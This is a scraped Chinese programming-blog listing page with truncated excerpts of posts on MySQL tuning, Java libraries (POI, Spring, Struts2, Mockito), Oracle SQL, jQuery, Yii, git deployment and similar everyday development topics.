            MySQL安装完毕后我们需要对它进行一些设置及性能优化,主要包括字符集设置,启动设置,连接优化,表优化,分区优化等等。           一 修改MySQL密码及用户      
  • [简单]poi删除excel 2007超链接 53873039oycg Excel
          采用解析sheet.xml方式删除超链接,缺点是要打开文件2次,代码如下:      public void removeExcel2007AllHyperLink(String filePath) throws Exception { OPCPackage ocPkg = OPCPac
  • Struts2添加 open flash chart 云端月影
    准备以下开源项目: 1. Struts 2.1.6 2. Open Flash Chart 2 Version 2 Lug Wyrm Charmer (28th, July 2009) 3. jofc2,这东西不知道是没做好还是什么意思,好像和ofc2不怎么匹配,最好下源码,有什么问题直接改。 4. log4j 用eclipse新建动态网站,取名OFC2Demo,将Struts2 l
  • spring包详解 aijuans spring
    下载的spring包中文件及各种包众多,在项目中往往只有部分是我们必须的,如果不清楚什么时候需要什么包的话,看看下面就知道了。 aspectj目录下是在Spring框架下使用aspectj的源代码和测试程序文件。Aspectj是java最早的提供AOP的应用框架。 dist 目录下是Spring 的发布包,关于发布包下面会详细进行说明。 docs&nb
  • 网站推广之seo概念 antonyup_2006 算法Web应用服务器搜索引擎Google
       持续开发一年多的b2c网站终于在08年10月23日上线了。作为开发人员的我在修改bug的同时,准备了解下网站的推广分析策略。     所谓网站推广,目的在于让尽可能多的潜在用户了解并访问网站,通过网站获得有关产品和服务等信息,为最终形成购买决策提供支持。     网站推广策略有很多,seo,email,adv
  • 单例模式,sql注入,序列 百合不是茶 单例模式序列sql注入预编译
      序列在前面写过有关的博客,也有过总结,但是今天在做一个JDBC操作数据库的相关内容时 需要使用序列创建一个自增长的字段  居然不会了,所以将序列写在本篇的前面    1,序列是一个保存数据连续的增长的一种方式; 序列的创建; CREATE SEQUENCE seq_pro 2 INCREMENT BY 1 -- 每次加几个 3
  • Mockito单元测试实例 bijian1013 单元测试mockito
    Mockito单元测试实例: public class SettingServiceTest { private List<PersonDTO> personList = new ArrayList<PersonDTO>(); @InjectMocks private SettingPojoService settin
  • 精通Oracle10编程SQL(9)使用游标 bijian1013 oracle数据库plsql
    /* *使用游标 */ --显示游标 --在显式游标中使用FETCH...INTO语句 DECLARE CURSOR emp_cursor is select ename,sal from emp where deptno=1; v_ename emp.ename%TYPE; v_sal emp.sal%TYPE; begin ope
  • 【Java语言】动态代理 bit1129 java语言
      JDK接口动态代理 JDK自带的动态代理通过动态的根据接口生成字节码(实现接口的一个具体类)的方式,为接口的实现类提供代理。被代理的对象和代理对象通过InvocationHandler建立关联   package com.tom; import com.tom.model.User; import com.tom.service.IUserService;
  • Java通信之URL通信基础 白糖_ javajdkwebservice网络协议ITeye
    java对网络通信以及提供了比较全面的jdk支持,java.net包能让程序员直接在程序中实现网络通信。 在技术日新月异的现在,我们能通过很多方式实现数据通信,比如webservice、url通信、socket通信等等,今天简单介绍下URL通信。 学习准备:建议首先学习java的IO基础知识   URL是统一资源定位器的简写,URL可以访问Internet和www,可以通过url
  • 博弈Java讲义 - Java线程同步 (1) boyitech java多线程同步
      在并发编程中经常会碰到多个执行线程共享资源的问题。例如多个线程同时读写文件,共用数据库连接,全局的计数器等。如果不处理好多线程之间的同步问题很容易引起状态不一致或者其他的错误。    同步不仅可以阻止一个线程看到对象处于不一致的状态,它还可以保证进入同步方法或者块的每个线程,都看到由同一锁保护的之前所有的修改结果。处理同步的关键就是要正确的识别临界条件(cri
  • java-给定字符串,删除开始和结尾处的空格,并将中间的多个连续的空格合并成一个。 bylijinnan java
    public class DeleteExtraSpace { /** * 题目:给定字符串,删除开始和结尾处的空格,并将中间的多个连续的空格合并成一个。 * 方法1.用已有的String类的trim和replaceAll方法 * 方法2.全部用正则表达式,这个我不熟 * 方法3.“重新发明轮子”,从头遍历一次 */ public static v
  • An error has occurred.See the log file错误解决! Kai_Ge MyEclipse
    今天早上打开MyEclipse时,自动关闭!弹出An error has occurred.See the log file错误提示! 很郁闷昨天启动和关闭还好着!!!打开几次依然报此错误,确定不是眼花了! 打开日志文件!找到当日错误文件内容: --------------------------------------------------------------------------
  • [矿业与工业]修建一个空间矿床开采站要多少钱? comsci
           地球上的钛金属矿藏已经接近枯竭...........        我们在冥王星的一颗卫星上面发现一些具有开采价值的矿床.....        那么,现在要编制一个预算,提交给财政部门..
  • 解析Google Map Routes dai_lm google api
    为了获得从A点到B点的路劲,经常会使用Google提供的API,例如 [url] http://maps.googleapis.com/maps/api/directions/json?origin=40.7144,-74.0060&destination=47.6063,-122.3204&sensor=false [/url] 从返回的结果上,大致可以了解应该怎么走,但
  • SQL还有多少“理所应当”? datamachine sql
    转贴存档,原帖地址:http://blog.chinaunix.net/uid-29242841-id-3968998.html、http://blog.chinaunix.net/uid-29242841-id-3971046.html! ------------------------------------华丽的分割线--------------------------------
  • Yii使用Ajax验证时,如何设置某些字段不需要验证 dcj3sjt126com Ajaxyii
    经常像你注册页面,你可能非常希望只需要Ajax去验证用户名和Email,而不需要使用Ajax再去验证密码,默认如果你使用Yii 内置的ajax验证Form,例如: $form=$this->beginWidget('CActiveForm', array(        'id'=>'usuario-form',&
  • 使用git同步网站代码 dcj3sjt126com crontabgit
    转自:http://ued.ctrip.com/blog/?p=3646?tn=gongxinjun.com   管理一网站,最开始使用的虚拟空间,采用提供商支持的ftp上传网站文件,后换用vps,vps可以自己搭建ftp的,但是懒得搞,直接使用scp传输文件到服务器,现在需要更新文件到服务器,使用scp真的很烦。发现本人就职的公司,采用的git+rsync的方式来管理、同步代码,遂
  • sql基本操作 蕃薯耀 sqlsql基本操作sql常用操作
    sql基本操作 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年6月1日 17:30:33 星期一     &
  • Spring4+Hibernate4+Atomikos3.3多数据源事务管理 hanqunfeng Hibernate4
    Spring3+后不再对JTOM提供支持,所以可以改用Atomikos管理多数据源事务。Spring2.5+Hibernate3+JTOM参考:http://hanqunfeng.iteye.com/blog/1554251Atomikos官网网站:http://www.atomikos.com/   一.pom.xml <dependency> <
  • jquery中两个值得注意的方法one()和trigger()方法 jackyrong trigger
      在jquery中,有两个值得注意但容易忽视的方法,分别是one()方法和trigger()方法,这是从国内作者<<jquery权威指南》一书中看到不错的介绍 1) one方法     one方法的功能是让所选定的元素绑定一个仅触发一次的处理函数,格式为    one(type,${data},fn) &nb
  • 拿工资不仅仅是让你写代码的 lampcy 工作面试咨询
    这是我对团队每个新进员工说的第一件事情。这句话的意思是,我并不关心你是如何快速完成任务的,哪怕代码很差,只要它像救生艇通气门一样管用就行。这句话也是我最喜欢的座右铭之一。 这个说法其实很合理:我们的工作是思考客户提出的问题,然后制定解决方案。思考第一,代码第二,公司请我们的最终目的不是写代码,而是想出解决方案。 话粗理不粗。 付你薪水不是让你来思考的,也不是让你来写代码的,你的目的是交付产品
  • 架构师之对象操作----------对象的效率复制和判断是否全为空 nannan408 架构师
    1.前言。   如题。 2.代码。 (1)对象的复制,比spring的beanCopier在大并发下效率要高,利用net.sf.cglib.beans.BeanCopier Src src=new Src(); BeanCopier beanCopier = BeanCopier.create(Src.class, Des.class, false);
  • ajax 被缓存的解决方案 Rainbow702 JavaScriptjqueryAjaxcache缓存
    使用jquery的ajax来发送请求进行局部刷新画面,各位可能都做过。 今天碰到一个奇怪的现象,就是,同一个ajax请求,在chrome中,不论发送多少次,都可以发送至服务器端,而不会被缓存。但是,换成在IE下的时候,发现,同一个ajax请求,会发生被缓存的情况,只有第一次才会被发送至服务器端,之后的不会再被发送。郁闷。 解决方法如下: ① 直接使用 JQuery提供的 “cache”参数,
  • 修改date.toLocaleString()的警告 tntxia String
      我们在写程序的时候,经常要查看时间,所以我们经常会用到date.toLocaleString(),但是date.toLocaleString()是一个过时 的API,代替的方法如下:   package com.tntxia.htmlmaker.util; import java.text.SimpleDateFormat; import java.util.
  • 项目完成后的小总结 xiaomiya js总结项目
    项目完成了,突然想做个总结但是有点无从下手了。 做之前对于客户端给的接口很模式。然而定义好了格式要求就如此的愉快了。 先说说项目主要实现的功能吧 1,按键精灵 2,获取行情数据 3,各种input输入条件判断 4,发送数据(有json格式和string格式) 5,获取预警条件列表和预警结果列表, 6,排序, 7,预警结果分页获取 8,导出文件(excel,text等) 9,修
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他